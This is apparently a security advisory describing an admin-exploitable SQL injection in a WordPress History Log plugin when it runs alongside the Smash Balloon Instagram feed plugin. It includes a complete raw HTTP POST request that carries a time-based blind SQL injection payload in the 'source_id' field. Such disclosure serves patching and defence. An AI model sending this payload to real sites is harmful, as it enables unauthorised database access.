Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.
[1] Navigate to Instagram Feed > Settings > Manage Sources, then click on "Delete Source".
SQL Injection occurs via the "?source_id" parameter in the below POST request:
==================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 526
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Accept: */*
Origin: http://192.168.178.130
Referer: http://192.168.178.130/wp-admin/admin.php?page=sbi-settings&view=general
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"
sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"
2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="username"
pentester14598
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="nonce"
036ad97501
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv--
==================
The AJAX hook "wp_ajax_sbi_feed_saver_manager_delete_source" subsequently passes the value of "source_id" and triggers the vulnerable SQL statement within History Log's function "click5_sbi_instagram_delete_source".